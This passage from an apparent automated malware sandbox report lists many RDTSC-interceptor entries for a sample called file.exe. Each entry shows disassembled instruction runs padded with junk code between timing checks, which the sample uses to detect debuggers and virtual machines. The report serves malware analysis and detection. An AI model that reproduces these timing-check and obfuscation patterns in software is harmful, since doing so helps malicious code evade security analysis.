                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9207BB second address: 9207BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920A5B second address: 920A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43A4BB4C36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920A76 second address: 920A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920A7C second address: 920A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920BCE second address: 920BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920BD4 second address: 920BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43A4BB4C38h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920BF5 second address: 920BFF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43A4FCF696h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920BFF second address: 920C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92521C second address: 925220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 924E07 second address: 924E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94219B second address: 9421A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9421A2 second address: 9421A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9421A8 second address: 9421C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 942006 second address: 94200A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94200A second address: 942029 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43A4FCF696h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jl 00007F43A4FCF696h 0x00000013 pop edx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 942029 second address: 94202D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94202D second address: 942035 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943D03 second address: 943D09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943D09 second address: 943D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95CAD4 second address: 95CAE6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F43A4BB4C2Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95CC3D second address: 95CC75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F43A4FCF6A7h 0x0000000b jns 00007F43A4FCF696h 0x00000011 jmp 00007F43A4FCF6A4h 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95CDF3 second address: 95CE07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F43A4BB4C2Eh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95CE07 second address: 95CE17 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F43A4FCF696h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95CE17 second address: 95CE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95CE1B second address: 95CE5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F43A4FCF6A5h 0x0000000e pushad 0x0000000f jmp 00007F43A4FCF6A0h 0x00000014 jbe 00007F43A4FCF696h 0x0000001a push edx 0x0000001b pop edx 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e popad 0x0000001f js 00007F43A4FCF69Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D19A second address: 95D19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D460 second address: 95D493 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F43A4FCF6A6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007F43A4FCF6A7h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D493 second address: 95D49D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43A4BB4C2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D49D second address: 95D4A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D723 second address: 95D727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9620FC second address: 962100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962100 second address: 96210A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43A4BB4C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96358B second address: 963591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 963591 second address: 963596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 963596 second address: 96359B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96359B second address: 9635B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F43A4BB4C2Ah 0x0000000b popad 0x0000000c je 00007F43A4BB4C2Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50D5B second address: 4D50D61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50D61 second address: 4D50D8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43A4BB4C37h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50D8B second address: 4D50DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4FCF6A4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50DA3 second address: 4D50DF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F43A4BB4C33h 0x00000011 pop eax 0x00000012 pushfd 0x00000013 jmp 00007F43A4BB4C39h 0x00000018 add ecx, 61E8FA86h 0x0000001e jmp 00007F43A4BB4C31h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50DF6 second address: 4D50E33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43A4FCF6A7h 0x00000009 and ecx, 451FD9BEh 0x0000000f jmp 00007F43A4FCF6A9h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40C2D second address: 4D40C7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bh, cl 0x0000000d mov dx, 7F9Eh 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007F43A4BB4C34h 0x00000018 xchg eax, ebp 0x00000019 jmp 00007F43A4BB4C30h 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40C7E second address: 4D40C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40C82 second address: 4D40C86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40C86 second address: 4D40C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40C8C second address: 4D40C9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4BB4C2Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40C9B second address: 4D40CB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop edi 0x0000000e jmp 00007F43A4FCF69Ah 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D20100 second address: 4D20111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 movsx edi, ax 0x00000008 pop eax 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D20111 second address: 4D2012E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D2012E second address: 4D2013E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4BB4C2Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D2013E second address: 4D201BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov ax, bx 0x0000000f pushfd 0x00000010 jmp 00007F43A4FCF6A9h 0x00000015 sub ax, 1DC6h 0x0000001a jmp 00007F43A4FCF6A1h 0x0000001f popfd 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 mov al, 57h 0x00000026 call 00007F43A4FCF6A9h 0x0000002b pop ebx 0x0000002c popad 0x0000002d push dword ptr [ebp+04h] 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F43A4FCF6A9h 0x00000037 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D201BD second address: 4D201E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F43A4BB4C2Dh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4061B second address: 4D4065B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov esi, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F43A4FCF6A4h 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 mov dl, cl 0x00000014 mov cl, dh 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 jmp 00007F43A4FCF6A2h 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4065B second address: 4D40661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40661 second address: 4D40666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40666 second address: 4D4066C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4066C second address: 4D40670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40529 second address: 4D40540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4BB4C33h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40540 second address: 4D40544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4028C second address: 4D40290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40290 second address: 4D40296 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40296 second address: 4D402D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F43A4BB4C30h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov cx, bx 0x00000014 movsx edi, ax 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov bx, 6F44h 0x00000020 movsx edi, cx 0x00000023 popad 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50039 second address: 4D5003F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5003F second address: 4D50043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50043 second address: 4D50071 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov cx, dx 0x0000000d mov di, 9EC6h 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F43A4FCF6A8h 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80F3E second address: 4D80FA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dl, 95h 0x0000000d call 00007F43A4BB4C30h 0x00000012 pop ecx 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F43A4BB4C2Dh 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d mov eax, 17F7FA73h 0x00000022 push eax 0x00000023 push edx 0x00000024 pushfd 0x00000025 jmp 00007F43A4BB4C36h 0x0000002a add cx, AD78h 0x0000002f jmp 00007F43A4BB4C2Bh 0x00000034 popfd 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60247 second address: 4D6025B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4FCF6A0h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6025B second address: 4D6025F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6025F second address: 4D602FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F43A4FCF69Eh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov ax, FAADh 0x00000014 pushfd 0x00000015 jmp 00007F43A4FCF69Ah 0x0000001a or ax, 1548h 0x0000001f jmp 00007F43A4FCF69Bh 0x00000024 popfd 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 jmp 00007F43A4FCF6A6h 0x0000002d mov eax, dword ptr [ebp+08h] 0x00000030 pushad 0x00000031 mov ecx, 054839FDh 0x00000036 pushfd 0x00000037 jmp 00007F43A4FCF69Ah 0x0000003c xor eax, 3FE47AD8h 0x00000042 jmp 00007F43A4FCF69Bh 0x00000047 popfd 0x00000048 popad 0x00000049 and dword ptr [eax], 00000000h 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f mov ebx, 63AB43C6h 0x00000054 call 00007F43A4FCF6A7h 0x00000059 pop esi 0x0000005a popad 0x0000005b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D602FC second address: 4D60315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4BB4C35h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60315 second address: 4D60319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60319 second address: 4D6033F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F43A4BB4C38h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6033F second address: 4D60366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF69Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43A4FCF6A5h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40452 second address: 4D40457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40457 second address: 4D4049F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 1EB37E0Fh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007F43A4FCF69Dh 0x00000017 pop eax 0x00000018 pushfd 0x00000019 jmp 00007F43A4FCF6A1h 0x0000001e add ch, FFFFFFA6h 0x00000021 jmp 00007F43A4FCF6A1h 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4049F second address: 4D404A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50CA8 second address: 4D50CFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 mov dx, 78AEh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebp 0x0000000d pushad 0x0000000e jmp 00007F43A4FCF6A0h 0x00000013 push ecx 0x00000014 mov dx, 5EA4h 0x00000018 pop ebx 0x00000019 popad 0x0000001a mov dword ptr [esp], ebp 0x0000001d pushad 0x0000001e mov ax, 17C5h 0x00000022 mov ebx, eax 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a call 00007F43A4FCF6A9h 0x0000002f pop ecx 0x00000030 mov edi, 0D133134h 0x00000035 popad 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50CFD second address: 4D50D28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F43A4BB4C38h 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60020 second address: 4D6008C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 50FAADAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov cl, 75h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F43A4FCF6A3h 0x00000016 and esi, 6ABC2EEEh 0x0000001c jmp 00007F43A4FCF6A9h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F43A4FCF6A0h 0x00000028 jmp 00007F43A4FCF6A5h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6008C second address: 4D60092 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60092 second address: 4D60096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60096 second address: 4D6009A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6009A second address: 4D600D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007F43A4FCF69Bh 0x00000012 add ax, AA5Eh 0x00000017 jmp 00007F43A4FCF6A9h 0x0000001c popfd 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D600D1 second address: 4D600F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ah, dl 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F43A4BB4C35h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D807E8 second address: 4D807EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D807EC second address: 4D807F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
